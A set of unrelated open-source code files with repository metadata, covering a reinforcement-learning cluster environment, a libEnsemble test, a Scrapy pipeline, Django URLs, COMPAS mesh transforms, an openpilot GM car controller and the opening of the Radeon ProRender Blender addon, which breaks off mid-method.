<reponame>Feng-XiaoYue/Reinforcement-learning-with-tensorflow-master import numpy as np import pandas as pd import random import time import sys if sys.version_info.major == 2: import Tkinter as tk else: import tkinter as tk class Cluster(tk.Tk, object): def __init__(self, state_init, server_attribute): super(Cluster, self).__init__() self.action_space = np.array([[0,0],[0,1],[0,2],[0,3], [1,0],[1,1],[1,2],[1,3], [2,0],[2,1],[2,2],[2,3], [3,0],[3,1],[3,2],[3,3], [4,0],[4,1],[4,2],[4,3], [5,0],[5,1],[5,2],[5,3], [6,0],[6,1],[6,2],[6,3], [7,0],[7,1],[7,2],[7,3], [8,0],[8,1],[8,2],[8,3], [9,0],[9,1],[9,2],[9,3], [10,0],[10,1],[10,2],[10,3], [11,0],[11,1],[11,2],[11,3]]) self.n_actions = len(self.action_space) self.cost_matrix = pd.DataFrame(np.array([[0,1,5,12], [1,0,4,2], [5,4,0,3], [12,2,3,0]]), columns=[0, 1, 2, 3]) self.server_attribute = server_attribute self.QSs = self.read_file() self.state_init = state_init self.cost_init = self.cost_init() def step(self, action, state, costs): s = state.copy() #action_real[查询,移动到的服务器] action_real = self.action_space[action] q = action_real[0] index_server = action_real[1] s.iloc[q, :] = 0 s.iloc[q, index_server] = 1 cost_new = self.cost_caculate(q, index_server) if cost_new > costs[q]: is_better = True else: is_better = False # costs[action_real[0]] = cost_new costs[q] = cost_new cost_all = self.cost_all(costs) reward = self.reward(cost_all, s) s_ = s return s_, costs, reward, cost_all, is_better #判断结束的条件 选择的action在执行之后状态仍然没有变 or 判断状态是否在处与某种情况下,例如负载不平衡 def is_finish(self): # TODO return True # read the file and store in an array[query,[server1,server2,......]] def read_file(self): server_attribute = self.server_attribute with open("D:\SynologyDrive\Reinforcement-learning-with-tensorflow-master\contents\MyExperiment\Exp3_test\QueryAttribute_test",'r') as f: content = f.readlines() QSs = [] for item in content: QS = [] item = item.strip("\n") q = item.split(",")[0] targetAttribute = item.split(",")[1:] targetAttribute = 
list(map(int, targetAttribute)) servers = [] for attribute in targetAttribute: server = server_attribute[server_attribute.loc[:, attribute] == 1].index[0] servers.append(server) QS.append(int(q)) QS.append(servers) QSs.append(QS) return QSs # compute the initial costs array based on the initial state matrix. every element represent the total cost of the query def cost_init(self): state_init = self.state_init # print(len(state_init)) states = self.state_array(state_init) # print(len(states)) costs = [] # print(len(state_init)) for i in range(len(state_init)): index_server = states[i][1] cost = self.cost_caculate(i, index_server) costs.append(cost) return costs def cost_caculate(self,q,index_server): cost = 0 for j in range(len(self.QSs[q][1])): target_server = self.QSs[q][1][j] cost += self.cost_matrix.iloc[index_server, target_server] return cost # create the initial state matrix(random) # compute the total reward based on the costs array def cost_all(self, costs): cost_all = 0 for i in range(len(costs)): cost_all += costs[i] return cost_all def reward(self, cost_all, state): list = [] for i in state.columns: list.append(state[i].sum()) load_weight_var = np.var(list) reward = (len(state)/cost_all) * self.function(1.1, load_weight_var) return reward def function(self, a, x): y = 100/(a**x) return y # transform the state matrix into array def state_array(self, state): states = [] for i in range(len(state)): for j in range(len(state.columns)): state_arr = [] if state.iloc[i, j] == 1: state_arr.append(i) state_arr.append(j) states.append(state_arr) return states def state_init(): init_state = pd.DataFrame(np.zeros(327*8).reshape(327, 8), columns=[0, 1, 2, 3, 4, 5, 6, 7]) for i in range(len(init_state)): j = random.randint(0, 7) init_state.iloc[i][j] = 1 return init_state # if __name__ == '__main__': # server_attribute = pd.DataFrame(np.array([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, # 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 1, 0, 0, # 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, # 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, # 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, # 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, # 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, # 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]). # reshape(8, 24), # columns=np.arange(24)) # env = Cluster(state_init(), server_attribute) # Qss = env.QSs # print(Qss) # for i in range(len(Qss)): # q = i # for j in range(len(server_attribute)): # index_server = j # print(env.cost_init) # print("The reward of initial state is:") # print(env.reward(env.cost_all(env.cost_init), env.state_init)) # print(env.state_init) # actions=list(range(env.n_actions)) # print(actions) # env.after(100, update) # env.mainloop()
2.828125
3
libensemble/tests/regression_tests/test_6-hump_camel_elapsed_time_abort.py
Kardyne/libensemble
0
16727
<filename>libensemble/tests/regression_tests/test_6-hump_camel_elapsed_time_abort.py<gh_stars>0 # """ # Runs libEnsemble on the 6-hump camel problem. Documented here: # https://www.sfu.ca/~ssurjano/camel6.html # # Execute via the following command: # mpiexec -np 4 python3 test_6-hump_camel_elapsed_time_abort.py # The number of concurrent evaluations of the objective function will be 4-1=3. # """ from __future__ import division from __future__ import absolute_import from __future__ import print_function from mpi4py import MPI # for libE communicator import sys, os # for adding to path import numpy as np # Import libEnsemble main from libensemble.libE import libE # Import sim_func from libensemble.sim_funcs.six_hump_camel import six_hump_camel # Import gen_func from libensemble.gen_funcs.uniform_sampling import uniform_random_sample def eprint(*args, **kwargs): print(*args, file=sys.stderr, **kwargs) script_name = os.path.splitext(os.path.basename(__file__))[0] #State the objective function, its arguments, output, and necessary parameters (and their sizes) sim_specs = {'sim_f': six_hump_camel, # This is the function whose output is being minimized 'in': ['x'], # These keys will be given to the above function 'out': [('f',float), # This is the output from the function being minimized ], 'pause_time': 2, # 'save_every_k': 10 } # State the generating function, its arguments, output, and necessary parameters. 
gen_specs = {'gen_f': uniform_random_sample, 'in': ['sim_id'], 'out': [('x',float,2), ], 'lb': np.array([-3,-2]), 'ub': np.array([ 3, 2]), 'gen_batch_size': 5, 'num_active_gens': 1, 'batch_mode': False, # 'save_every_k': 10 } # Tell libEnsemble when to stop exit_criteria = {'elapsed_wallclock_time': 1} np.random.seed(1) persis_info = {} for i in range(MPI.COMM_WORLD.Get_size()): persis_info[i] = {'rand_stream': np.random.RandomState(i)} # Perform the run H, persis_info, flag = libE(sim_specs, gen_specs, exit_criteria, persis_info) if MPI.COMM_WORLD.Get_rank() == 0: eprint(flag) eprint(H) assert flag == 2 short_name = script_name.split("test_", 1).pop() filename = short_name + '_results_History_length=' + str(len(H)) + '_evals=' + str(sum(H['returned'])) + '_ranks=' + str(MPI.COMM_WORLD.Get_size()) print("\n\n\nRun completed.\nSaving results to file: " + filename) # if flag == 2: # print("\n\n\nKilling COMM_WORLD") # MPI.COMM_WORLD.Abort()
2.46875
2
do_like_javac/tools/graphtools.py
zcai1/do-like-javac
1
16728
import os import argparse from . import common argparser = argparse.ArgumentParser(add_help=False) graph_group = argparser.add_argument_group('graphtool arguments') graph_group.add_argument('--graph-jar', metavar='<graphtool-jar>', action='store',default=None, dest='graph_jar', help='Path to prog2dfg.jar or apilearner.jar') def run(args, javac_commands, jars): if not args.graph_jar: print("Could not run graph tool: missing arg --graph-jar") return tool_command = ["java", "-jar", args.graph_jar] dot_dir = os.path.join(args.output_directory, "dot") if not os.path.isdir(dot_dir): os.makedirs(dot_dir) for jc in javac_commands: java_files = jc['java_files'] java_files_file = os.path.join(os.getcwd(), '__java_file_names.txt') class_dir = common.class_directory(jc) with open(java_files_file, 'w') as f: for s in java_files: f.write(s) f.write("\n") current_outdir = os.path.join(dot_dir, class_dir.replace(os.getcwd(),'').replace(os.sep,"_")) cmd = tool_command + ["-o", current_outdir, "-j", class_dir, "-all", "-source", java_files_file] common.run_cmd(cmd, args, 'graphtools')
2.6875
3
boss_grabbing/pipelines.py
shansb/boss_grabbing
0
16729
<reponame>shansb/boss_grabbing<filename>boss_grabbing/pipelines.py # -*- coding: utf-8 -*- # Define your item pipelines here # # Don't forget to add your pipeline to the ITEM_PIPELINES setting # See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html from boss_grabbing.sqlite import Sqlite class BossGrabbingPipeline(object): def process_item(self, item, spider): print("process") count = Sqlite.select_db(item['url'])[0][0] print("count:" + str(count)) if count == 0: Sqlite.insert_db(item) return item
2.375
2
core/jobs/urls.py
InKyrNet/inkyrnet
0
16730
from django.urls import path from .views import * from django_filters.views import FilterView app_name = 'jobs' urlpatterns = [ path('', FilterView.as_view(filterset_class=JobFilter, template_name='jobs/job_list.html'), name='index'), path('companies/', CompanyListView.as_view(), name='companies'), ]
1.804688
2
src/compas/datastructures/mesh/transformations_numpy.py
arpastrana/compas
2
16731
from __future__ import print_function from __future__ import absolute_import from __future__ import division from compas.geometry import transform_points_numpy __all__ = [ 'mesh_transform_numpy', 'mesh_transformed_numpy', ] def mesh_transform_numpy(mesh, transformation): """Transform a mesh. Parameters ---------- mesh : compas.datastructures.Mesh The mesh. transformation : compas.geometry.Transformation The transformation. Notes ----- The mesh is modified in-place. Examples -------- >>> mesh = Mesh.from_obj(compas.get('cube.obj')) >>> T = matrix_from_axis_and_angle([0, 0, 1], pi / 4) >>> tmesh = mesh.copy() >>> mesh_transform(tmesh, T) """ vertices = list(mesh.vertices()) xyz = [mesh.vertex_coordinates(vertex) for vertex in vertices] xyz[:] = transform_points_numpy(xyz, transformation) for index, vertex in enumerate(vertices): mesh.vertex_attributes(vertex, 'xyz', xyz[index]) def mesh_transformed_numpy(mesh, transformation): """Transform a copy of ``mesh``. Parameters ---------- mesh : compas.datastructures.Mesh The mesh. transformation : compas.geometry.Transformation The transformation. Returns ------- Mesh A transformed independent copy of ``mesh``. Notes ----- The original mesh is not modified. Instead a transformed independent copy is returned. Examples -------- >>> mesh = Mesh.from_obj(compas.get('cube.obj')) >>> T = matrix_from_axis_and_angle([0, 0, 1], pi / 4) >>> tmesh = mesh_transformed(mesh, T) """ mesh_copy = mesh.copy() mesh_transform_numpy(mesh_copy, transformation) return mesh_copy # ============================================================================== # Main # ============================================================================== if __name__ == "__main__": import doctest doctest.testmod(globs=globals())
2.765625
3
selfdrive/car/gm/carcontroller.py
CTyrell/openpilot
0
16732
from cereal import car from common.realtime import DT_CTRL from common.numpy_fast import interp from common.realtime import sec_since_boot from selfdrive.config import Conversions as CV from selfdrive.car import apply_std_steer_torque_limits from selfdrive.car.gm import gmcan from selfdrive.car.gm.values import DBC, AccState, CanBus, CarControllerParams from opendbc.can.packer import CANPacker VisualAlert = car.CarControl.HUDControl.VisualAlert class CarController(): def __init__(self, dbc_name, CP, VM): self.start_time = 0. self.apply_steer_last = 0 self.lka_steering_cmd_counter_last = -1 self.lka_icon_status_last = (False, False) self.steer_rate_limited = False self.fcw_count = 0 self.params = CarControllerParams() self.packer_pt = CANPacker(DBC[CP.carFingerprint]['pt']) self.packer_obj = CANPacker(DBC[CP.carFingerprint]['radar']) self.packer_ch = CANPacker(DBC[CP.carFingerprint]['chassis']) self.debug_logging = False self.debug_log_time_step = 0.333 self.last_debug_log_t = 0. if self.debug_logging: with open("/data/openpilot/coast_debug.csv","w") as f: f.write(",".join([ "t", "long plan", "d (m/s)", "v", "vEgo", "v_cruise", "v (mph)", "vEgo (mph)", "v_cruise (mph)", "ttc", "coast gas lockout", "coast brake lockout", "gas in", "brake in", "one-pedal", "coasting enabled", "no f brakes", "gas out", "brake out"]) + "\n") def update(self, enabled, CS, frame, actuators, hud_v_cruise, hud_show_lanes, hud_show_car, hud_alert): P = self.params # Send CAN commands. can_sends = [] # Steering (50Hz) # Avoid GM EPS faults when transmitting messages too close together: skip this transmit if we just received the # next Panda loopback confirmation in the current CS frame. 
if CS.lka_steering_cmd_counter != self.lka_steering_cmd_counter_last: self.lka_steering_cmd_counter_last = CS.lka_steering_cmd_counter elif (frame % P.STEER_STEP) == 0: lkas_enabled = (enabled or CS.pause_long_on_gas_press) and CS.lkMode and not (CS.out.steerWarning or CS.out.steerError) and CS.out.vEgo > P.MIN_STEER_SPEED and CS.lane_change_steer_factor > 0. if lkas_enabled: new_steer = int(round(actuators.steer * P.STEER_MAX * CS.lane_change_steer_factor)) apply_steer = apply_std_steer_torque_limits(new_steer, self.apply_steer_last, CS.out.steeringTorque, P) self.steer_rate_limited = new_steer != apply_steer else: apply_steer = 0 self.apply_steer_last = apply_steer # GM EPS faults on any gap in received message counters. To handle transient OP/Panda safety sync issues at the # moment of disengaging, increment the counter based on the last message known to pass Panda safety checks. idx = (CS.lka_steering_cmd_counter + 1) % 4 can_sends.append(gmcan.create_steering_control(self.packer_pt, CanBus.POWERTRAIN, apply_steer, idx, lkas_enabled)) # Gas/regen prep if not enabled or CS.pause_long_on_gas_press: # Stock ECU sends max regen when not enabled. apply_gas = P.MAX_ACC_REGEN apply_brake = 0 else: apply_gas = interp(actuators.accel, P.GAS_LOOKUP_BP, P.GAS_LOOKUP_V) apply_brake = interp(actuators.accel, P.BRAKE_LOOKUP_BP, P.BRAKE_LOOKUP_V) t = sec_since_boot() v_rel = CS.coasting_lead_v - CS.vEgo ttc = min(-CS.coasting_lead_d / v_rel if (CS.coasting_lead_d > 0. and v_rel < 0.) else 100.,100.) d_time = CS.coasting_lead_d / CS.vEgo if (CS.coasting_lead_d > 0. and CS.vEgo > 0. and CS.tr > 0.) else 10. if CS.coasting_lead_d > 0. 
and (ttc < CS.lead_ttc_long_gas_lockout_bp[-1] \ or v_rel < CS.lead_v_rel_long_gas_lockout_bp[-1] \ or CS.coasting_lead_v < CS.lead_v_long_gas_lockout_bp[-1] \ or d_time < CS.tr * CS.lead_tr_long_gas_lockout_bp[-1]\ or CS.coasting_lead_d < CS.lead_d_long_gas_lockout_bp[-1]): lead_long_gas_lockout_factor = max([ interp(v_rel, CS.lead_v_rel_long_gas_lockout_bp, CS.lead_v_rel_long_gas_lockout_v), interp(CS.coasting_lead_v, CS.lead_v_long_gas_lockout_bp, CS.lead_v_long_gas_lockout_v), interp(ttc, CS.lead_ttc_long_gas_lockout_bp, CS.lead_ttc_long_gas_lockout_v), interp(d_time / CS.tr, CS.lead_tr_long_gas_lockout_bp, CS.lead_tr_long_gas_lockout_v), interp(CS.coasting_lead_d, CS.lead_d_long_gas_lockout_bp, CS.lead_d_long_gas_lockout_v)]) if CS.coasting_lead_d > 0. and (ttc < CS.lead_ttc_long_brake_lockout_bp[-1] \ or v_rel < CS.lead_v_rel_long_brake_lockout_bp[-1] \ or CS.coasting_lead_v < CS.lead_v_long_brake_lockout_bp[-1] \ or d_time < CS.tr * CS.lead_tr_long_brake_lockout_bp[-1]\ or CS.coasting_lead_d < CS.lead_d_long_brake_lockout_bp[-1]): lead_long_brake_lockout_factor = max([ interp(v_rel, CS.lead_v_rel_long_brake_lockout_bp, CS.lead_v_rel_long_brake_lockout_v), interp(CS.coasting_lead_v, CS.lead_v_long_brake_lockout_bp, CS.lead_v_long_brake_lockout_v), interp(ttc, CS.lead_ttc_long_brake_lockout_bp, CS.lead_ttc_long_brake_lockout_v), interp(d_time / CS.tr, CS.lead_tr_long_brake_lockout_bp, CS.lead_tr_long_brake_lockout_v), interp(CS.coasting_lead_d, CS.lead_d_long_brake_lockout_bp, CS.lead_d_long_brake_lockout_v)]) else: lead_long_brake_lockout_factor = 0. # 1.0 means regular braking logic is completely unaltered, 0.0 means no cruise braking else: lead_long_gas_lockout_factor = 0. # 1.0 means regular braking logic is completely unaltered, 0.0 means no cruise braking lead_long_brake_lockout_factor = 0. 
# 1.0 means regular braking logic is completely unaltered, 0.0 means no cruise braking # debug logging do_log = self.debug_logging and (t - self.last_debug_log_t > self.debug_log_time_step) if do_log: self.last_debug_log_t = t f = open("/data/openpilot/coast_debug.csv","a") f.write(",".join([f"{i:.1f}" if i == float else str(i) for i in [ t - CS.sessionInitTime, CS.coasting_long_plan, CS.coasting_lead_d, CS.coasting_lead_v, CS.vEgo, CS.v_cruise_kph * CV.KPH_TO_MS, CS.coasting_lead_v * CV.MS_TO_MPH, CS.vEgo * CV.MS_TO_MPH, CS.v_cruise_kph * CV.KPH_TO_MPH, ttc, lead_long_gas_lockout_factor, lead_long_brake_lockout_factor, int(apply_gas), int(apply_brake), (CS.one_pedal_mode_active or CS.coast_one_pedal_mode_active), CS.coasting_enabled, CS.no_friction_braking]]) + ",") if (CS.one_pedal_mode_active or CS.coast_one_pedal_mode_active): if not CS.one_pedal_mode_active and CS.gear_shifter_ev == 4 and CS.one_pedal_dl_coasting_enabled and CS.vEgo > 0.05: apply_gas = apply_gas * lead_long_gas_lockout_factor + float(P.ZERO_GAS ) * (1. - lead_long_gas_lockout_factor) else: apply_gas = apply_gas * lead_long_gas_lockout_factor + float(P.MAX_ACC_REGEN) * (1. 
- lead_long_gas_lockout_factor) time_since_brake = t - CS.one_pedal_mode_last_gas_press_t if CS.one_pedal_mode_active: if abs(CS.angle_steers) > CS.one_pedal_angle_steers_cutoff_bp[0]: one_pedal_apply_brake = interp(CS.vEgo, CS.one_pedal_mode_stop_apply_brake_bp[CS.one_pedal_brake_mode], CS.one_pedal_mode_stop_apply_brake_v[CS.one_pedal_brake_mode]) one_pedal_apply_brake_minus1 = interp(CS.vEgo, CS.one_pedal_mode_stop_apply_brake_bp[max(0,CS.one_pedal_brake_mode-1)], CS.one_pedal_mode_stop_apply_brake_v[max(0,CS.one_pedal_brake_mode-1)]) one_pedal_apply_brake = interp(abs(CS.angle_steers), CS.one_pedal_angle_steers_cutoff_bp, [one_pedal_apply_brake, one_pedal_apply_brake_minus1]) else: one_pedal_apply_brake = interp(CS.vEgo, CS.one_pedal_mode_stop_apply_brake_bp[CS.one_pedal_brake_mode], CS.one_pedal_mode_stop_apply_brake_v[CS.one_pedal_brake_mode]) one_pedal_apply_brake *= interp(CS.pitch, CS.one_pedal_pitch_brake_adjust_bp, CS.one_pedal_pitch_brake_adjust_v[CS.one_pedal_brake_mode]) one_pedal_apply_brake = min(one_pedal_apply_brake, float(P.BRAKE_LOOKUP_V[0])) one_pedal_apply_brake *= interp(time_since_brake, CS.one_pedal_mode_ramp_time_bp, CS.one_pedal_mode_ramp_time_v) if CS.one_pedal_brake_mode < 2 else 1. else: one_pedal_apply_brake = 0. # ramp braking if CS.one_pedal_mode_active_last and time_since_brake > CS.one_pedal_mode_ramp_time_bp[-1]: if CS.one_pedal_mode_apply_brake != one_pedal_apply_brake: if CS.one_pedal_mode_ramp_mode_last != CS.one_pedal_brake_mode: # brake mode changed, so need to calculate new step based on the old and new modes old_apply_brake = interp(CS.vEgo, CS.one_pedal_mode_stop_apply_brake_bp[CS.one_pedal_mode_ramp_mode_last], CS.one_pedal_mode_stop_apply_brake_v[CS.one_pedal_mode_ramp_mode_last]) CS.one_pedal_mode_ramp_time_step = (one_pedal_apply_brake - old_apply_brake) / (CS.one_pedal_mode_ramp_duration * (2. 
if CS.one_pedal_mode_apply_brake > one_pedal_apply_brake else 1.)) if CS.one_pedal_mode_apply_brake < one_pedal_apply_brake: if CS.one_pedal_mode_ramp_time_step < 0.: CS.one_pedal_mode_ramp_time_step *= -1. CS.one_pedal_mode_apply_brake = max(one_pedal_apply_brake, CS.one_pedal_mode_apply_brake + CS.one_pedal_mode_ramp_time_step * (t - CS.one_pedal_mode_ramp_t_last)) else: if CS.one_pedal_mode_ramp_time_step > 0.: CS.one_pedal_mode_ramp_time_step *= -1. CS.one_pedal_mode_apply_brake = min(one_pedal_apply_brake, CS.one_pedal_mode_apply_brake + CS.one_pedal_mode_ramp_time_step * (t - CS.one_pedal_mode_ramp_t_last)) one_pedal_apply_brake = CS.one_pedal_mode_apply_brake else: CS.one_pedal_mode_apply_brake = one_pedal_apply_brake CS.one_pedal_mode_active_last = True CS.one_pedal_mode_ramp_t_last = t CS.one_pedal_mode_ramp_mode_last = CS.one_pedal_brake_mode if CS.one_pedal_mode_op_braking_allowed and CS.coasting_long_plan not in ['cruise', 'limit']: apply_brake = max(one_pedal_apply_brake, apply_brake * lead_long_brake_lockout_factor) else: apply_brake = one_pedal_apply_brake elif CS.coasting_enabled and lead_long_brake_lockout_factor < 1.: if CS.coasting_long_plan in ['cruise', 'limit'] and apply_gas < P.ZERO_GAS or apply_brake > 0.: check_speed_ms = (CS.speed_limit if CS.speed_limit_active and CS.speed_limit < CS.v_cruise_kph else CS.v_cruise_kph) * CV.KPH_TO_MS if apply_brake > 0.: coasting_over_speed_vEgo_BP = [ interp(CS.vEgo, CS.coasting_over_speed_vEgo_BP_BP, CS.coasting_over_speed_vEgo_BP[0]), interp(CS.vEgo, CS.coasting_over_speed_vEgo_BP_BP, CS.coasting_over_speed_vEgo_BP[1]) ] over_speed_factor = interp(CS.vEgo / check_speed_ms, coasting_over_speed_vEgo_BP, [0., 1.]) if (check_speed_ms > 0. and CS.coasting_brake_over_speed_enabled) else 0. 
over_speed_brake = apply_brake * over_speed_factor apply_brake = max([apply_brake * lead_long_brake_lockout_factor, over_speed_brake]) if apply_gas < P.ZERO_GAS and lead_long_gas_lockout_factor < 1.: coasting_over_speed_vEgo_BP = [ interp(CS.vEgo, CS.coasting_over_speed_vEgo_BP_BP, CS.coasting_over_speed_regen_vEgo_BP[0]), interp(CS.vEgo, CS.coasting_over_speed_vEgo_BP_BP, CS.coasting_over_speed_regen_vEgo_BP[1]) ] over_speed_factor = interp(CS.vEgo / check_speed_ms, coasting_over_speed_vEgo_BP, [0., 1.]) if (check_speed_ms > 0 and CS.coasting_brake_over_speed_enabled) else 0. coast_apply_gas = int(round(float(P.ZERO_GAS) - over_speed_factor * (P.ZERO_GAS - apply_gas))) apply_gas = apply_gas * lead_long_gas_lockout_factor + coast_apply_gas * (1. - lead_long_gas_lockout_factor) elif CS.no_friction_braking and lead_long_brake_lockout_factor < 1.: if CS.coasting_long_plan in ['cruise', 'limit'] and apply_brake > 0.: apply_brake *= lead_long_brake_lockout_factor apply_gas = int(round(apply_gas)) apply_brake = int(round(apply_brake)) CS.one_pedal_mode_active_last = CS.one_pedal_mode_active if do_log: f.write(",".join([str(i) for i in [ apply_gas, apply_brake]]) + "\n") f.close() if CS.showBrakeIndicator: CS.apply_brake_percent = 0. 
if CS.vEgo > 0.1: if CS.out.cruiseState.enabled: if not CS.pause_long_on_gas_press: if apply_brake > 1: CS.apply_brake_percent = interp(apply_brake, [float(P.BRAKE_LOOKUP_V[-1]), float(P.BRAKE_LOOKUP_V[0])], [51., 100.]) elif (CS.one_pedal_mode_active or CS.coast_one_pedal_mode_active): CS.apply_brake_percent = interp(CS.hvb_wattage, CS.hvb_wattage_bp, [0., 50.]) elif apply_gas < P.ZERO_GAS: CS.apply_brake_percent = interp(apply_gas, [float(P.GAS_LOOKUP_V[0]), float(P.GAS_LOOKUP_V[1])], [51., 0.]) else: CS.apply_brake_percent = interp(CS.hvb_wattage, CS.hvb_wattage_bp, [0., 50.]) elif CS.is_ev and CS.out.brake == 0.: CS.apply_brake_percent = interp(CS.hvb_wattage, CS.hvb_wattage_bp, [0., 50.]) elif CS.out.brake > 0.: CS.apply_brake_percent = interp(CS.out.brake, [0., 0.5], [51., 100.]) elif CS.out.brake > 0.: CS.apply_brake_percent = interp(CS.out.brake, [0., 0.5], [51., 100.]) # Gas/regen and brakes - all at 25Hz if (frame % 4) == 0: idx = (frame // 4) % 4 if CS.cruiseMain and not enabled and CS.autoHold and CS.autoHoldActive and not CS.out.gasPressed and CS.out.gearShifter in ['drive','low'] and CS.out.vEgo < 0.02 and not CS.regenPaddlePressed: # Auto Hold State car_stopping = apply_gas < P.ZERO_GAS standstill = CS.pcm_acc_status == AccState.STANDSTILL at_full_stop = standstill and car_stopping near_stop = (CS.out.vEgo < P.NEAR_STOP_BRAKE_PHASE) and car_stopping can_sends.append(gmcan.create_friction_brake_command(self.packer_ch, CanBus.CHASSIS, apply_brake, idx, near_stop, at_full_stop)) CS.autoHoldActivated = True else: if CS.pause_long_on_gas_press: at_full_stop = False near_stop = False car_stopping = False standstill = False else: car_stopping = apply_gas < P.ZERO_GAS standstill = CS.pcm_acc_status == AccState.STANDSTILL at_full_stop = enabled and standstill and car_stopping near_stop = enabled and (CS.out.vEgo < P.NEAR_STOP_BRAKE_PHASE) and car_stopping can_sends.append(gmcan.create_friction_brake_command(self.packer_ch, CanBus.CHASSIS, apply_brake, idx, 
near_stop, at_full_stop)) CS.autoHoldActivated = False # Auto-resume from full stop by resetting ACC control acc_enabled = enabled if standstill and not car_stopping: acc_enabled = False can_sends.append(gmcan.create_gas_regen_command(self.packer_pt, CanBus.POWERTRAIN, apply_gas, idx, acc_enabled, at_full_stop)) # Send dashboard UI commands (ACC status), 25hz if (frame % 4) == 0: send_fcw = hud_alert == VisualAlert.fcw follow_level = CS.get_follow_level() can_sends.append(gmcan.create_acc_dashboard_command(self.packer_pt, CanBus.POWERTRAIN, enabled, hud_v_cruise * CV.MS_TO_KPH, hud_show_car, follow_level, send_fcw)) # Radar needs to know current speed and yaw rate (50hz), # and that ADAS is alive (10hz) time_and_headlights_step = 10 tt = frame * DT_CTRL if frame % time_and_headlights_step == 0: idx = (frame // time_and_headlights_step) % 4 can_sends.append(gmcan.create_adas_time_status(CanBus.OBSTACLE, int((tt - self.start_time) * 60), idx)) can_sends.append(gmcan.create_adas_headlights_status(self.packer_obj, CanBus.OBSTACLE)) speed_and_accelerometer_step = 2 if frame % speed_and_accelerometer_step == 0: idx = (frame // speed_and_accelerometer_step) % 4 can_sends.append(gmcan.create_adas_steering_status(CanBus.OBSTACLE, idx)) can_sends.append(gmcan.create_adas_accelerometer_speed_status(CanBus.OBSTACLE, CS.out.vEgo, idx)) if frame % P.ADAS_KEEPALIVE_STEP == 0: can_sends += gmcan.create_adas_keepalive(CanBus.POWERTRAIN) # Show green icon when LKA torque is applied, and # alarming orange icon when approaching torque limit. # If not sent again, LKA icon disappears in about 5 seconds. # Conveniently, sending camera message periodically also works as a keepalive. 
lka_active = CS.lkas_status == 1 lka_critical = lka_active and abs(actuators.steer) > 0.9 lka_icon_status = (lka_active, lka_critical) if frame % P.CAMERA_KEEPALIVE_STEP == 0 or lka_icon_status != self.lka_icon_status_last: steer_alert = hud_alert in [VisualAlert.steerRequired, VisualAlert.ldw] can_sends.append(gmcan.create_lka_icon_command(CanBus.SW_GMLAN, lka_active, lka_critical, steer_alert)) self.lka_icon_status_last = lka_icon_status return can_sends
2.15625
2
src/rprblender/__init__.py
ralic/RadeonProRenderBlenderAddon
1
16733
<filename>src/rprblender/__init__.py #********************************************************************** # Copyright 2020 Advanced Micro Devices, Inc # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #******************************************************************** import traceback import bpy bl_info = { "name": "Radeon ProRender", "author": "AMD", "version": (3, 1, 0), "blender": (2, 80, 0), "location": "Info header, render engine menu", "description": "Radeon ProRender rendering plugin for Blender 2.8x", "warning": "", "tracker_url": "", "wiki_url": "", "category": "Render" } version_build = "" from .utils import logging, version_updater from .utils import install_libs from .engine.engine import Engine from . 
import ( nodes, properties, ui, operators, material_library, ) from .engine.render_engine import RenderEngine from .engine.render_engine_2 import RenderEngine2 from .engine.preview_engine import PreviewEngine from .engine.viewport_engine import ViewportEngine from .engine.viewport_engine_2 import ViewportEngine2 from .engine.animation_engine import AnimationEngine, AnimationEngine2 from .engine.render_engine_hybrid import RenderEngine as RenderEngineHybrid from .engine.viewport_engine_hybrid import ViewportEngine as ViewportEngineHybrid from .engine.animation_engine_hybrid import AnimationEngine as AnimationEngineHybrid log = logging.Log(tag='init') log("Loading RPR addon {}".format(bl_info['version'])) render_engine_cls = { 'FULL': RenderEngine, 'HIGH': RenderEngineHybrid, 'MEDIUM': RenderEngineHybrid, 'LOW': RenderEngineHybrid, 'FULL2': RenderEngine2, } animation_engine_cls = { 'FULL': AnimationEngine, 'HIGH': AnimationEngineHybrid, 'MEDIUM': AnimationEngineHybrid, 'LOW': AnimationEngineHybrid, 'FULL2': AnimationEngine2, } viewport_engine_cls = { 'FULL': ViewportEngine, 'HIGH': ViewportEngineHybrid, 'MEDIUM': ViewportEngineHybrid, 'LOW': ViewportEngineHybrid, 'FULL2': ViewportEngine2, } class RPREngine(bpy.types.RenderEngine): """ Main class of Radeon ProRender render engine for Blender v2.80+ """ bl_idname = "RPR" bl_label = "Radeon ProRender" bl_use_preview = True bl_use_shading_nodes = True bl_use_shading_nodes_custom = False bl_info = "Radeon ProRender rendering plugin" engine: Engine = None def __del__(self): if isinstance(self.engine, ViewportEngine): self.engine.stop_render() log('__del__', self.as_pointer()) # final render def update(self, data, depsgraph): """ Called for final render """ log('update', self.as_pointer()) # TODO: We create for every view layer separate Engine. 
